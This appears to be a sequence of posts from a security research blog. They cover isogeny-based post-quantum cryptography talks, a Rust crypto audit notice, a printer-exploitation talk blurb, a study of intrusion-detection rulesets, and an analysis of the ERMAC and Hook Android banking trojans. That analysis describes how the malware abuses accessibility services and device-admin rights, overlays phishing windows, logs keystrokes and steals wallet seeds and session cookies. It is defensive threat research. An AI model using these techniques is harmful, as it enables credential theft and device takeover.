The study of post-quantum cryptography was the focus of many of the cryptographic talks over the course of the week, although the context and presentation of these problems was still very diverse. Zooming out, SIAM collectively organised 128+ sessions and 10 plenary talks; a full list of the program is available online. With a diverse group of people and a wide range of topics, the idea was not to attend everything (this is physically impossible for those who cannot split themselves into ~fourteen sentient pieces), but rather pick our own adventure from the program.

For the cryptographers who visited Eindhoven, there were three main symposia, which ran through the week without collisions:

  • Applications of Algebraic Geometry to Post-Quantum Cryptology.
  • Elliptic Curves and Pairings in Cryptography.
  • Applications of Isogenies in Cryptography.

Additional cryptography talks were in the single session “Advances in Code-Based Signatures”, which ran concurrently with the pairing talks on the Wednesday.

For those interested in a short summary of many of the talks at SIAM, Luca De Feo wrote a blog post about his experience of the conference which is available on Elliptic News. As a compliment to what has then already been written, the aim of this blogpost is to give a general impression of what people are thinking about and the research which is currently ongoing.

In particular, the goal of this post is to summarize and give context to two of the main research focuses in isogeny-based cryptography which were talked about during the week. On one side, there is a deluge in new protocols being put forward which study isogenies between abelian varieties, generalising away from dimension one isogenies between elliptic curves. On the other side, the isogeny-based digital signature algorithm, SQIsign, has recently been submitted to the recent call for new quantum safe signatures by NIST. Many talks through the week focused on algorithmic and parameter improvements to aid in the submission process.

What is an isogeny?

For those less familiar with isogenies, a very rough way to start thinking about isogeny-based cryptography can be understood as long as you have a good idea of how it feels to get lost, even when you know where you’re supposed to be going. Essentially, you can take a twisting and turning walk by using an “isogeny” to step from one elliptic curve to another. If I tell you where I started and where I end up, it seems very difficult for someone else to determine exactly the path I took to get there. In this way, our cryptographic secret is our path and our public information is the final curve at the end of this long walk.

Not only does this problem seem difficult, it also seems equally difficult for both classical and quantum computers, which makes it an ideal candidate for the building block of new protocols which aim to be quantum-safe. For some more context on the search for protocols in a “post-quantum” world, Thomas Pornin wrote an overview at the closing of round three of the NIST post-quantum project which ended about a year ago at the time of writing.

A little more specifically, for those interested, an isogeny is a special map which respects both the geometric idea of elliptic curves (it maps some projective curve to another), but also the algebraic group structure which cryptographers hold so dear (mapping the sum of points is the same as the sum of the individually mapped points). Concretely, an isogeny is some (non-constant) rational map which maps the identity on one curve to the identity of another.

Isogenies in Higher Dimensions

For the past year, isogeny-based cryptography has undergone a revolution after a series of papers appeared which broke the key exchange protocol SIDH. The practical breakage of SIDH was particularly spectacular as it essentially removed the key-exchange mechanism, SIKE, from the NIST post-quantum project; which only weeks before had been chosen by NIST to continue to the fourth round as a prospective alternative candidate to Kyber.

For more information on the break of SIDH, I have a post on the SageMath implementation of the first attack, as well as a summary of the Eurocrypt 2023 conference, where the three attack papers were presented in the best-paper award plenary talks. Thomas Decru, one of the authors of the first attack paper, wrote a fantastic blog post which is a great overview of how the attack works.

The key to all of the attacks was that given some special data, information about the secret walk between elliptic curves could be recovered by computing an isogeny in “higher dimension”. In fact, the short description about isogenies was a little to restrictive. For the past ten years, cryptographers have been looking at how to compute isogenies between supersingular elliptic curves. However, over the fence in maths world, a generalisation of this idea is to look at isogenies between principally polarised superspecial abelian varieties. When we talk about these superspecial abelian varieties, a natural way to categorise them is by their “genus”, or “dimension”.

Luckily, for now, we don’t need to worry about arbitrary dimension, as for the current work we really only need dimension two for the attack on SIDH, and for some new proposed schemes, dimensions four and eight, which I won’t discuss much further.

If you want to imagine these higher dimensional varieties, one way is to think about three dimensional surfaces which have some “holes” or “handles”. A dimension one variety is an elliptic curve, which you can imagine as a donut. In dimension two we have two options, the generic object is some surface with two handles (a donut with two holes? Where’s all my donut gone?), but there are also “products of elliptic curves”, which can be seen as two dimensional surfaces which can in some sense be factored into two dimension-one surfaces (or abstractly, as a pair of donuts!).

The core computation of the attack is a two-dimensional iosgeny between elliptic products. An isogeny between elliptic products is simply a walk which takes you from one of these pairs of donuts, through many many steps of the generic surface and ends on another special surface which factors into donuts again. A natural question to ask is, how special are these products? When we work in a finite field with characteristic p, we have about p^3 surfaces available and only p^2 of these are elliptic products. In cryptographic contexts, where the characteristic is usually very very large, it’s essentially impossible to accidentally land on one of these products.

With this as background, we can now ask a few natural questions:

  • When can we compute isogenies between elliptic products?
  • Why do we want to compute isogenies between elliptic products?
  • How can we ask computers to compute isogenies between elliptic products?

Understanding when we find these very special isogenies between elliptic products was categorised by Ernst Kani in 1997, and it was this lemma which illuminated the method to attack SIDH. Kani’s criterion described how when a set of one dimensional isogenies has particular properties, and when you additionally know certain information about the points on these curves, you would find that your specially chosen two dimensional isogeny would walk between elliptic products.

This is what Thomas Decru talked about in his presentation, which gave a wonderful overview of why these criteria were enough to successfully break SIDH. The idea is that although some of this information is secret, you can guess small parts of the secret and when you are correct, your two dimensional isogeny splits at the end. Guessing each part of the secret in turn then very quickly recovers the entire secret.

Following the description of the death of SIKE, Tako Boris Fouotsa talked about possible ways to modify the SIDH protocol to revive it. The general idea is to hide parts of the information Kani’s criterion required to in such a way that an attacker can no longer guess it piece by piece. One method is to take the information you need from the points on curves and mask it by multiplying them by some secret scalar.

Masking these points, which are the torsion data for the curves, was also the topic of two other talks. Guido Lido gave an energetic and enjoyable double-talk on the “level structure” of elliptic curves, which was complimented very nicely by a talk by Luca De Feo the following day which gave another perspective on how modular curves can help us complete the zoology of these torsion structures. Along with this categorisation, Luca gave a preview of a novel attack on one possible variant of SIDH which hides half of the torsion data. If the SIDH is to be dragged back into protocols with the strategies discussed by Boris, it’s vital to really understand mathematically what this masking is, highlighting the importance of the work by Guido, Luca and their collaborators.

Although breaking a well-known and long standing cryptographic protocol is more than enough motivation to study these isogenies, the continued research on computing higher dimensional isogenies will be motivated by the introduction of these maps into protocols themselves. This brings us to the why, and this was addressed by Benjamin Wesolowski, who discussed SQIsignHD and Luciano Maino, who discussed FESTA. As SQIsign and related talks will soon have a section of its own, we’ll jump straight to FESTA.

The essence of FESTA is to find a way to configure some one dimensional isogenies during keygen and encryption such that during decryption, a holder of the secret key can perform the SIDH attack, while no one else can. As the SIDH attack describes secrets about the one dimensional isogenies, encryption is then a case of using some message to describe the isogeny path and as decryption recovers this path it also recovers the secret message. The core of how FESTA works is tied up in categories of masking, as Guido and Luca described. Luciano used his presentation to give an overview of how everything comes together, and how by using commutative masking matrices, encryption masks away certain critical data, and then during decryption the masking can be removed due thanks to the commutativity.

The idea of using SIDH attacks to build a quantum-safe public key encryption protocol is not new. In SETA, a very similar protocol was described. However, due to the inefficiencies of the SIDH attacks at the time, the protocol itself did not have practical running times. The key to what makes FESTA efficient is precisely the new polynomial time algorithms for the attack.

To close out the third session of the isogeny session, I then did my best to try and talk about the how. Given the motivation that these isogenies can be used constructively to build quantum-safe protocols, can we find ways to strip back the complications in existing implementations and get something efficient and simple enough so it appears suitable for cryptographic protocols. The talk was split between the three categories of isogenies we need:

  • The first step is understanding how to compute the “gluing isogeny”, between a product of elliptic curves and the resulting dimension-two surface.
  • The last step is understanding how to efficiently compute the “splitting isogeny” from a two-dimensional surface to a pair of elliptic curves.
  • All other steps are then isogenies between these generic two dimensional surfaces. These are described by the Richelot correspondence, which date back to the 19th century and are surprisingly simple considering the work they do.

I described some new results which allow for particularly efficient gluing isogenies, and that working algebraically, a closed form of the splitting isogeny can be recovered, saving about 90% of the work of the usual methods. For the middle steps, there’s still much work to be done and I hope as a community we can continue optimising these isogenies.

In summary, the SIDH attacks have introduced a whole new toolbox of isogenies and it’s exciting to see these being used constructively and optimised for real-world usage. The cryptanalysis on isogenies based protocols of course has it’s own revolution and understanding how higher dimensional structures can make or break new schemes is vibrant and exciting work.

An Isogeny Walk back to NIST

Back in dimension one, an isogeny-based digital signature algorithm has been submitted to NIST’s recent call for protocols. Of the 40 candidates which appeared with round one coming online, only one is isogeny-based. SQIsign is an extremely compact, but relatively new and slow protocol which was introduced in 2020 and was followed up with a paper with various performance enhancements in 2022.

Underlying SQIsign is a fairly simple idea. The signer has computes a secret isogeny path between two elliptic curves. The starting curve, which is public and known to everyone, has special properties. The signer publishes their ending curve as a public key, but as only they know the isogeny between the curve, only the signer knows special properties of the ending curve. A signature is computed from a high-soundness sigma protocol, which essentially boils down to asking the signer to compute something which they could only know if they know this secret isogeny.

Concretely, SQIsign is built on the knowledge of the endomorphism ring of an elliptic curve, which is the set of isogenies from a curve to itself. The starting curve is chosen so everyone knows its endomorphism ring. The trick in SQIsign is that although generally it seems hard to compute the endomorphism ring of a random supersingular curve, if you know an isogeny between two curves and the endomorphism ring of one of them, you can efficiently compute the endomorphism ring of the other. This means that the secret isogeny allows the signer to “transport” the endomorphism ring from the starting curve to their public curve thanks to their secret isogeny and so the endomorphism ring of this end curve is secret to everyone except the signer.

Algorithms become efficient thanks to the Deuring correspondence, which takes information from an elliptic curve and represents it using a quaternion algebra. In quaternion world, certain problems become easy which are hard on elliptic curves, and once the right information is recovered, the Deuring correspondence maps this all back to elliptic curve world so the protocol can continue. Ultimately all of the above boils down to “things are computationally easy if you know the endomorphism ring”. Because of this, as signer can compute things from the public curve which nobody else can feasibly do.

There’s a lot of buzzwords in the above, and unpicking exactly how SQIsign works is challenging. For the interested reader, I recommend the above papers, along with Antonin Leroux’s thesis. For those who like to learn along with the implementation, I worked with some collaborators to write a verbose implementation following the first SQIsign paper in SageMath. A blog discussing implementation challenges was written: Learning to SQI and the code is on GitHub.

The selling point of SQIsign is its compact representation. For NIST level I security (128-bit), a public key requires only 64 bytes and a signature only 177 bytes. Compare this to Dilithium, a lattice based scheme chosen at the end of round three, which at the same security level has public keys with 1312 bytes and signatures of 2420 bytes! However, the main drawback is that it’s magnitudes slower than Dilithium, and the complex, heuristic algorithms of some of the quaternion algebra pieces means that writing a safe and side-channel resistant implementation is extremely challenging.

At SIAM, progress in closing the efficiency gap was the subject of several talks, and optimisations are being found in a variety of ways. Lorenz Panny discussed the Deuring correspondence in a more general setting, where he showed that with some clever algorithmic tricks, isogenies could be computed in reasonable time by using extension fields to gather enough data for the Deuring correspondence to be feasible, even for inefficient parameter sets.

On the flip side of this, Michael Meyer discussed recent advances in parameter searching for SQIsign, which makes the work that Lorenz described particularly efficient. One of the main bottlenecks in SQIsign is in computing large prime degree isogenies, which occurs because SQIsign requires the characteristic p to both have p+1 and p-1 to have many small factors and for large p, it’s tough to ensure all these factors stay as small as possible. Michael discussed several different tricks which can be used to find twin smooth numbers and how different techniques are beneficial depending on the size of bit-length of p. The upshot is the culmination of all the ideas has allowed the SQIsign team to find valid parameter sets targeting all three NIST security levels.

Antonin Leroux talked more specifically about the Deuring correspondence as used in the context of SQIsign and focused on the improvements between the 2020 and 2022 SQIsign papers. The takeaway was that several improvements have resulted in performance enhancements to allow up to NIST-V parameter sets, but the protocol was a long way off competing with the lattice protocols which had already been picked. Optimistically, we can always work hard to find faster ways to do mathematics, and the compact keys and signatures of SQIsign make it extremely attractive for certain use cases.

To finish the summary, we can come back to Benjamin Wesolowski’s talk, which described recent research which adopts the progress in higher dimensions and modifies the SQIsign protocol, removing many heuristic and complicated steps during keygen and signing and shifts the protocol’s complexity into verification.

The main selling point of SQIsignHD is that it is not only simpler to implement in many ways, but the security proofs become much more straight forward, which should go a long way to show that the protocol is robust. However, unlike the original SQIsign, SQIsignHD verification requires the computation of a four dimensional isogeny. These isogenies are theoretically described, but a full implementation of these is still a work in progress. Understanding precisely how the verification time is affected is key to understanding whether the HD-remake of SQIsign could either replace of exist along side of the original description.

Acknowledgements

Many thanks to Aleksander Kircanski for reading an earlier draft of this blog post, and to all the people I worked with during the week in Eindhoven.

Public Report – Entropy/Rust Cryptography Review

30 August 2023 at 16:00

During the summer of 2023, Entropy Cryptography Inc engaged NCC Group’s Cryptography Services team to perform a cryptography and implementation review of several Rust-based libraries implementing constant-time big integer arithmetic, prime generation, and secp256k1 (k256) elliptic curve functionality. Two consultants performed the review within 40 person-days of effort, which included retesting and report generation.

The three primary code repositories in scope for this review were:

  1. github.com/RustCrypto/crypto-bigint
  2. github.com/entropyxyz/crypto-primes
  3. github.com/RustCrypto/elliptic-curves/k256.

The review identified a range of issues that were addressed promptly once reported, with the proposed fixes aligning with the recommendations made in the report below.

HITB Phuket 2023 – Exploiting the Lexmark PostScript Stack

31 August 2023 at 09:23

Aaron Adams presented this talk at HITB Phuket on the 24th August 2023. The talk
detailed how NCC Exploit Development Group (EDG) in Pwn2Own 2022 Toronto was
able to exploit two different PostScript vulnerabilities in Lexmark printers.
The presentation is a good primer for those interested in further researching
the Lexmark PostScript stack, and also those interested in how PostScript
interpreter exploitation can be approached in general.

The slides for the talk can be downloaded here.

Ruling the rules

8 September 2023 at 14:55

Mathew Vermeer is a doctoral candidate at the Organisation Governance department of the faculty of Technology, Policy and Management of Delft University of Technology. At the same university, he has received both a BSc degree in Computer Science and Engineering, as well as a MSc degree in Computer Science with a specialization in cyber security. His master’s thesis examined (machine learning-based) network intrusion detection systems (NIDSs), their effectiveness in practice, and methods for their proper evaluation in real-world settings. In 2019 he joined the university as a PhD researcher. Mathew’s current research similarly includes NIDS performance and management processes within organizations, as well as external network asset discovery and security incident prediction.

Introduction

The following is a short summary of a study conducted as part of my PhD research at TU Delft in collaboration with Fox-IT. We’re interested in studying the different processes and technologies that determine or impact the security posture of organizations. In this case, we set out to better understand the signature-based network intrusion detection system (NIDS). Ubiquitous within the field of network security, it’s been part of the bedrock of network security for over two decades, and industry reports have been predicting its demise for almost just as long [1]. Both industry and academia [2, 3] seem to be pushing for a gradual phasing out of the supposedly “less-capable” [2] signature-based NIDS in favour of machine-learning (ML) methods. The former uses sets of signatures (or rules) that inform the NIDS what to look for in network traffic and flag as potentially malicious, while the latter uses statistical techniques to find potentially malicious anomalies within network traffic. The underlying motivation is that conventional rule- and signature-based methods are deemed unable to keep up with the fast-evolving threats and will, therefore, become increasingly obsolete. While some argue for complementary use, others imply outright replacement to be a more effective solution, comparing their own ML system with an improperly configured (i.e., enabling every single rule from the Emerging Threats community ruleset) signature-based NIDS to try to drive home the point [4]. On the other hand, walk into any security operations center (SOC) and what you’ll see is analysts triaging alerts generated by NIDSs that still rely heavily on rulesets.   So how much of this push is simply hype and how much is backed up by actual data? Do traditional signature-based NIDSs truly no longer add to an organization’s security? To answer this, we analyzed alert and incident data from Fox-IT, and the many proprietary and commercial rulesets employed at Fox-IT spanning from mid-2009 to mid-2018. We used this data to examine how Fox-IT manages its own signature-based NIDS to provide security for its clients. The most interesting results are described below.

NIDS environment

First, it’s helpful to get acquainted with the environment in place at Fox-IT. The figure below roughly illustrates the NIDS pipeline in use at Fox-IT, starting from the NIDS rules on the left to the incidents all the way on the right. Rules are either purchased from a threat intel vendor or created in-house. Of note is that in-house rules are usually tested for a period of time, where they are tweaked until its performance is deemed acceptable, which can vary depending on the novelty, severity, etc., of the threat it is trying to detect. Once that condition is reached, the rules added to the production environment, where rules can again be modified based on its performance in a real-world environment.

Modelling the workflows in this way allows us to find relationships between alerts, incidents, and rules, as well as the effects that security events have on the manner in which rules are managed.

Custom ruleset important for proper functioning of NIDS

One of the go-to metrics for measuring the effectiveness of security systems is their precision [5]. This is because, as opposed to simple accuracy, precision penalizes false positives. Since false positive detections is something rule developers and SOC analysts often strive to minimize, it stands to reason that such occurrences are taken into account when measuring the performance of an NIDS. We found that the custom rulesets Fox-IT creates in-house is critical for the proper functioning of its NIDS. The precision of Fox-IT’s proprietary ruleset is higher than the commercial sets employed: an average of 0.74, in contrast to 0.68 and 0.65 for the commercial rulesets, respectively. Important to note here is that the commercial sets achieve such precision scores only because of extensive tuning by the Fox-IT team prior to introducing the rules into the sensors. Had this not occurred, their measured precision would be much lower (in case the sensors had not burst into flames beforehand). The Fox-IT ruleset is much smaller than the commercial rule sets: around 2,000 rules versus over the tens of thousands commercial rules from ET and Talos. Nevertheless, the rules within Fox-IT’s own ruleset are present in 27% of all true positive incidents. This is surprising, given the massive difference in ruleset size (2,000 Fox-IT rules vs. 50,000+ commercial rules) and, therefore, threat coverage. Both findings here clearly demonstrate the higher utility of Fox-IT’s proprietary rules. Still, they clearly play a complementary role to the commercial rules, which is something we explore in a different study.

Newest rules produce most incidents

The figure below shows the average age of rules plotted against the number of incidents that such a particular rule of that age will trigger on average per week. For instance, the spike on the left represents rules that are a week old. Such a week-old rule would, then, on average, produce around four incidents per week. This means that it’s the newest rules that produce the most incidents. The implications of this are twofold. Firstly, it emphasizes the importance of staying up to date with the global threat landscape. It is insufficient to rely on rules and rulesets that perfectly protected your organization once upon a time. SOC teams need to continuously scour for new threats and perform their own research to maintain their organization and their clients secure. And secondly, rules seem to lose their relevance and effectiveness as time goes by. Probably obvious, yes, but it hints at the possibilities of another type of NIDS optimization: performance issues. While disabling any and all rules that pass a certain age threshold might not be the wisest of decisions, SOC teams can examine old rules to determine which ones produce results that are less than satisfactory. Such rules can then potentially be disabled, depending, of course, on the type of rule, severity of the threat it is designed to detect, its precision (or any other metric), etc.

99.8% of (detected) true positive incidents caught before becoming successful attacks

Finally, the image below is a visual representation of all the alerts we analyzed, and how they are condensed into incidents, true positive incidents, and successful attacks. For the 13 years of data made available for this analysis, we counted 62 million alerts that our SOC analysts processed. They were able to condense the 62 million alerts into 150,000 incidents. Out of these 150,000 incidents, they were again condensed to 69,000 true positive incidents. And finally, out of the 69,000, only 106 of these incidents turned out to be successful attacks. With some quick math we can deduce that 99.8% of all true positive incidents detected by the SOC were discovered before they were able to cause any serious damage to the organizations that they aim to protect on a daily basis. I’ll point out, though, that this number obviously ignores the potential false negatives that were able to evade detection. This is, naturally, a number that we can’t easily measure accurately. However, we’re certain it doesn’t run high enough to significantly alter the result, and so, we’re confident in the accuracy of the computed percentage.

Conclusion

So, with all of these results, we demonstrate that signature-based systems are still effective, given that they are managed properly, for example, by keeping them up to date with the newest threat intelligence. Of course, future work is still needed to compare the signature-based approach to other different types of intrusion detection approaches, whether they’re other network-based, host-based or application-based approaches. Only once that comparison is done will we be able to determine whether these signature-based systems really do need to be phased out as archaic and obsolete pieces of technology or if they remain an indispensable part of our network security. As it currently stands, however, the fact that they continue to provide value and security to the organizations that use them is indisputable.   This was a quick overview of a few findings from our study. If you’re curious for more, you’re welcome to take a look at the full paper (https://dl.acm.org/doi/abs/10.1145/3488932.3517412).

References

[1] http://web.archive.org/web/20201209162847/https://bricata.com/blog/ids-is-dead/

[2] Shone, N., Ngoc, T.N., Phai, V.D. and Shi, Q., 2018. A deep learning approach to network intrusion detection. IEEE transactions on emerging topics in computational intelligence, 2(1), pp.41-50.

[3] Vigna, G., 2010, December. Network intrusion detection: dead or alive?. In Proceedings of the 26th Annual Computer Security Applications Conference (pp. 117-126).

[4] Mirsky, Y., Doitshman, T., Elovici, Y. and Shabtai, A., 2018. Kitsune: an ensemble of autoencoders for online network intrusion detection. arXiv preprint arXiv:1802.09089.

[5] He, H. and Garcia, E.A., 2009. Learning from imbalanced data. IEEE Transactions on knowledge and data engineering, 21(9), pp.1263-1284.

From ERMAC to Hook: Investigating the technical differences between two Android malware variants

11 September 2023 at 09:03

Authored by Joshua Kamp (main author) and Alberto Segura.

Summary

Hook and ERMAC are Android based malware families that are both advertised by the actor named “DukeEugene”. Hook is the latest variant to be released by this actor and was first announced at the start of 2023. In this announcement, the actor claims that Hook was written from scratch [1]. In our research, we have analysed two samples of Hook and two samples of ERMAC to further examine the technical differences between these malware families.

After our investigation, we concluded that the ERMAC source code was used as a base for Hook. All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also exist in Hook. The code implementation for these commands is nearly identical. The main features in ERMAC are related to sending SMS messages, displaying a phishing window on top of a legitimate app, extracting a list of installed applications, SMS messages and accounts, and automated stealing of recovery seed phrases for multiple cryptocurrency wallets.

Hook has introduced a lot of new features, with a total of 38 additional commands when comparing the latest version of Hook to ERMAC. The most interesting new features in Hook are: streaming the victim’s screen and interacting with the interface to gain complete control over an infected device, the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, due to “leaving for special military operation”. On May 11th, 2023, the actors claimed that the source code of Hook was sold at a price of $70.000. If these announcements are true, it could mean that we will see interesting new versions of Hook in the future.

The launch of Hook

On the 12th of January 2023, DukeEugene started advertising a new Android botnet to be available for rent: Hook.

Forum post where DukeEugene first advertised Hook.

Hook malware is designed to steal personal information from its infected users. It contains features such as keylogging, injections/overlay attacks to display phishing windows over (banking) apps (more on this in the “Overlay attacks” section of this blog), and automated stealing of cryptocurrency recovery seeds.

Financial gain seems to be the main motivator for operators that rent Hook, but the malware can be used to spy on its victims as well. Hook is rented out at a cost of $7.000 per month.

Forum post showing the rental price of Hook, along with the claim that it was written from scratch.

The malware was advertised with a wide range of functionality in both the control panel and build itself, and a snippet of this can be seen in the screenshot below.

Some of Hook’s features that were advertised by DukeEugene.

Command comparison

Analyst’s note: The package names and file hashes that were analysed for this research can be found in the “Analysed samples” section at the end of this blog post.

While checking out the differences in these malware families, we compared the C2 commands (instructions that are sent by the malware operator to the infected device) in each sample. This analysis did lead us to find several new commands and features on Hook, as can be seen just looking at the number of commands implemented in each variant.

SampleNumber of commands
Hook sample #158
Hook sample #268
Ermac sample #1 #230

All 30 commands that exist in ERMAC also exist in Hook. Most of these commands are related to sending SMS messages, updating and starting injections, extracting a list of installed applications, SMS messages and accounts, and starting another app on the victim’s device (where cryptocurrency wallet apps are the main target). While simply launching another app may not seem that malicious at first, you will think differently after learning about the automated features in these malware families.

Automated features in the Hook C2 panel.

Both Hook and ERMAC contain automated functionality for stealing recovery seeds from cryptocurrency wallets. These can be used to gain access to the victim’s cryptocurrency. We will dive deeper into this feature later in the blog.

When comparing Hook to ERMAC, 29 new commands have been added to the first sample of Hook that we analysed, and the latest version of Hook contains 9 additional commands on top of that. Most of the commands that were added in Hook are related to interacting with the user interface (UI).

Hook command: start_vnc

The UI interaction related commands (such as “clickat” to click on a specific UI element and “longpress” to dispatch a long press gesture) in Hook go hand in hand with the new “start_vnc” command, which starts streaming the victim’s screen.

A decompiled method that is called after the “start_vnc” command is received by the bot.

In the code snippet above we can see that the createScreenCaptureIntent() method is called on the MediaProjectionManager, which is necessary to start screen capture on the device. Along with the many commands to interact with the UI, this allows the malware operator to gain complete control over an infected device and perform actions on the victim’s behalf.


Controls for the malware operator related to the “start_vnc” command.

Command implementation

For the commands that are available in both ERMAC and Hook, the code implementation is nearly identical. Take the “logaccounts” command for example:

Decompiled code that is related to the “logaccounts” command in ERMAC and Hook.

This command is used to obtain a list of available accounts by their name and type on the victim’s device. When comparing the code, it’s clear that the logging messages are the main difference. This is the case for all commands that are present in both ERMAC and Hook.

Russian commands

Both ERMAC and the Hook v1 sample that we analysed contain some rather edgy commands in Russian, that do not provide any useful functionality.

Decompiled code which contains Russian text in ERMAC and first versions of Hook.

The command above translates to “Die_he_who_reversed_this“.

All the Russian commands create a file named “system.apk” in the “apk” directory and immediately deletes it. It appears that the authors have recently adapted their approach to managing a reputable business, as these commands were removed in the latest Hook sample that we analysed.

New commands in Hook V2

In the latest versions of Hook, the authors have added 9 additional commands compared to the first Hook sample that we analysed. These commands are:

CommandDescription
send_sms_manySends an SMS message to multiple phone numbers
addwaitviewDisplays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
removewaitviewRemoves the “wait / loading” view that is displayed on the victim’s device because of the “addwaitview” command
addviewAdds a new view with a black background that covers the entire screen
removeviewRemoves the view with the black background that was added by the “addview” command
cookieSteals session cookies (targets victim’s Google account)
safepalStarts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
exodusStarts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
takephotoTakes a photo of the victim using the front facing camera

One of the already existing commands, “onkeyevent”, also received a new payload option: “double_tap”. As the name suggests, this performs a double tap gesture on the victim’s screen, providing the malware operator with extra functionality to interact with the victim’s device user interface.

More interesting additions are: the support for stealing recovery seed phrases from other crypto wallets (Safepal and Exodus), taking a photo of the victim, and stealing session cookies. Session cookie stealing appears to be a popular trend in Android malware, as we have observed this feature being added to multiple malware families. This is an attractive feature, as it allows the actor to gain access to user accounts without needing the actual login credentials.

Device Admin abuse

Besides adding new commands, the authors have added more functionality related to the “Device Administration API” in the latest version of Hook. This API was developed to support enterprise apps in Android. When an app has device admin privileges, it gains additional capabilities meant for managing the device. This includes the ability to enforce password policies, locking the screen and even wiping the device remotely. As you may expect: abuse of these privileges is often seen in Android malware.

DeviceAdminReceiver and policies

To implement custom device admin functionality in a new class, it should extend the “DeviceAdminReceiver”. This class can be found by examining the app’s Manifest file and searching for the receiver with the “BIND_DEVICE_ADMIN” permission or the “DEVICE_ADMIN_ENABLED” action.

Defined device admin receiver in the Manifest file of Hook 2.

In the screenshot above, you can see an XML file declared as follows: android:resource=”@xml/buyanigetili. This file will contain the device admin policies that can be used by the app. Here’s a comparison of the device admin policies in ERMAC, Hook 1, and Hook 2:

Differences between device admin policies in ERMAC and Hook.

Comparing Hook to ERMAC, the authors have removed the “WIPE_DATA” policy and added the “RESET_PASSWORD” policy in the first version of Hook. In the latest version of Hook, the “DISABLE_KEYGUARD_FEATURES” and “WATCH_LOGIN” policies were added. Below you’ll find a description of each policy that is seen in the screenshot.

Device Admin PolicyDescription
USES_POLICY_FORCE_LOCKThe app can lock the device
USES_POLICY_WIPE_DATAThe app can factory reset the device
USES_POLICY_RESET_PASSWORDThe app can reset the device’s password/pin code
USES_POLICY_DISABLE_KEYGUARD_FEATURESThe app can disable use of keyguard (lock screen) features, such as the fingerprint scanner
USES_POLICY_WATCH_LOGINThe app can watch login attempts from the user

The “DeviceAdminReceiver” class in Android contains methods that can be overridden. This is done to customise the behaviour of a device admin receiver. For example: the “onPasswordFailed” method in the DeviceAdminReceiver is called when an incorrect password is entered on the device. This method can be overridden to perform specific actions when a failed login attempt occurs. In ERMAC and Hook 1, the class that extends the DeviceAdminReceiver only overrides the onReceive() method and the implementation is minimal:


Full implementation of the class to extend the DeviceAdminReceiver in ERMAC. The first version of Hook contains the same implementation.

The onReceive() method is the entry point for broadcasts that are intercepted by the device admin receiver. In ERMAC and Hook 1 this only performs a check to see whether the received parameters are null and will throw an exception if they are.

DeviceAdminReceiver additions in latest version of Hook

In the latest edition of Hook, the class to extend the DeviceAdminReceiver does not just override the “onReceive” method. It also overrides the following methods:

Device Admin MethodDescription
onDisableRequested()Called when the user attempts to disable device admin. Gives the developer a chance to present a warning message to the user
onDisabled()Called prior to device admin being disabled. Upon return, the app can no longer use the protected parts of the DevicePolicyManager API
onEnabled()Called after device admin is first enabled. At this point, the app can use “DevicePolicyManager” to set the desired policies
onPasswordFailed()Called when the user has entered an incorrect password for the device
onPasswordSucceeded()Called after the user has entered a correct password for the device

When the victim attempts to disable device admin, a warning message is displayed that contains the text “Your mobile is die”.

Decompiled code that shows the implementation of the “onDisableRequested” method in the latest version of Hook.

The fingerprint scanner will be disabled when an incorrect password was entered on the victim’s device. Possibly to make it easier to break into the device later, by forcing the victim to enter their PIN and capturing it.

Decompiled code that shows the implementation of the “onPasswordFailed” method in the latest version of Hook.

All keyguard (lock screen) features are enabled again when a correct password was entered on the victim’s device.

Decompiled code that shows the implementation of the “onPasswordSucceeded” method in the latest version of Hook.

Overlay attacks

Overlay attacks, also known as injections, are a popular tactic to steal credentials on Android devices. When an app has permission to draw overlays, it can display content on top of other apps that are running on the device. This is interesting for threat actors, because it allows them to display a phishing window over a legitimate app. When the victim enters their credentials in this window, the malware will capture them.

Both ERMAC and Hook use web injections to display a phishing window as soon as it detects a targeted app being launched on the victim’s device.

Decompiled code that shows partial implementation of overlay injections in ERMAC and Hook.

In the screenshot above, you can see how ERMAC and Hook set up a WebView component and load the HTML code to be displayed over the target app by calling webView5.loadDataWithBaseURL(null, s6, “text/html”, “UTF-8”, null) and this.setContentView() on the WebView object. The “s6” variable will contain the data to be loaded. The main functionality is the same for both variants, with Hook having some additional logging messages.

The importance of accessibility services

Accessibility Service abuse plays an important role when it comes to web injections and other automated feature in ERMAC and Hook. Accessibility services are used to assist users with disabilities, or users who may temporarily be unable to fully interact with their Android device. For example: users that are driving might need additional or alternative interface feedback. Accessibility services run in the background and receive callbacks from the system when AccessibilityEvent is fired. Apps with accessibility service can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, they can get the package name, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities such as: keylogging, automatically granting itself additional permissions, and monitoring foreground apps and overlaying them with phishing windows.

When ERMAC or Hook malware is first launched, it prompts the victim with a window that instructs them to enable accessibility services for the malicious app.

Instruction window to enable the accessibility service, which is shown upon first execution of ERMAC and Hook malware.

A warning message is displayed before enabling the accessibility service, which shows what actions the app will be able to perform when this is enabled.

Warning message that is displayed before enabling accessibility services.

With accessibility services enabled, ERMAC and Hook malware automatically grants itself additional permissions such as permission to draw overlays. The onAccessibilityEvent() method monitors the package names from received accessibility events, and the web injection related code will be executed when a target app is launched.

Targeted applications

When the infected device is ready to communicate with the C2 server, it sends a list of applications that are currently installed on the device. The C2 server then responds with the target apps that it has injections for. While dynamically analysing the latest version of Hook, we sent a custom HTTP request to the C2 server to make it believe that we have a large amount of apps (700+) installed. For this, we used the list of package names that CSIRT KNF had shared in an analysis report of Hook [2].

Part of our manually crafted HTTP request that includes a list of “installed apps” for our infected device.

The server responded with the list of target apps that the malware can display phishing windows for. Most of the targeted apps in both Hook and ERMAC are related to banking.

Part of the C2 server response that contains the target apps for overlay injections.

Keylogging

Keylogging functionality can be found in the onAccessibilityEvent() method of both ERMAC and Hook. For every accessibility event type that is triggered on the infected device, a method is called that contains keylogger functionality. This method then checks what the accessibility event type was to label the log and extracts the text from it. Comparing the code implementation of keylogging in ERMAC to Hook, there are some slight differences in the accessibility event types that it checks for. But the main functionality of extracting text and sending it to the C2 with a certain label is the same.

Decompiled code snippet of keylogging in ERMAC and in Hook.

